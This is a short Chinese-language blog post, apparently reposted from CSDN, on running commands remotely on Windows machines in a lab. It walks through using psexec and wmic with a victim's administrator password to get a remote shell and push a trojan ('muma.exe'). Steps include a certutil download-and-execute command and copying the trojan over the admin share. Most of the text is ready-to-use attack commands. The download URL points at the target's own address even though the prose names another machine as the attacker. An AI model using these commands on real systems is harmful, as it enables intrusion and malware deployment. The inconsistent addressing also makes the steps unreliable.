windows远程命令执行

以下所有实验均在工作组环境下

psexec

psexec.exe \\ip –accepteula -u username -p password program.exe
psexec.exe \\host -accepteula -u domain\username -p password -d -c
#这里面的账号密码都是被攻击机器的账号密码,ip与host也是被攻击主机的ip与host。
如果是域环境的话,命令为PsExec.exe \\192.168.23.99 -u test\lisi -p 123 -c cmd

获取对方主机的账号密码后且对方开启445端口,可以使用psexec来进行远程命令执行。
psexec \\172.16.99.233 -u administrator -p 123 -c cmd.exe 获取cmdshell
psexec \\172.16.99.233 -u administrator -p 123 -c muma.exe
#这里面的账号密码都是被攻击机器的账号密码,ip与host也是被攻击主机的ip与host。

使172.16.99.233主机执行在172.16.99.235上的muma.exe文件。达到了在远程主机执行本地文件的目的。攻击机器为172.16.99.235,muma.exe这个文件也在172.16.99.235这个主机上,但是通过上面的命令就可以使得这个文件执行在172.16.99.233这个主机上,进而达到远程控制的效果。
在这里插入图片描述

wmic

方法1:控制远程主机下载并执行文件

wmic /node:172.16.99.233 /user:Administrator /password:123  process call create "cmd /c  certutil.exe -urlcache -split -f http://172.16.99.233/muma.exe c:/windows/temp/putty3.exe & c:/windows/temp/putty3.exe"

#这里面的账号密码都是被攻击机器的账号密码,ip与host也是被攻击主机的ip与host。
在这里插入图片描述
上述命令的意思是,连接172.16.99.233并创建一个进程,这个进程是使用cmd 执行命令去 http://172.16.99.233/muma.exe下载这个文件,并保存到本地的 c:/windows/temp/putty3.exe并执行。

方法2:复制本地文件到远程主机并控制远程主机执行

copy muma.exe \\172.16.99.233\c$\windows\temp\test.exe  ##IPC拷贝木马文件
wmic /node:172.16.99.233 /user:administrator /password:123 process call create “c:\windows\temp\test.exe”

#这里面的账号密码都是被攻击机器的账号密码,ip与host也是被攻击主机的ip与host。
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_41874930/article/details/108245293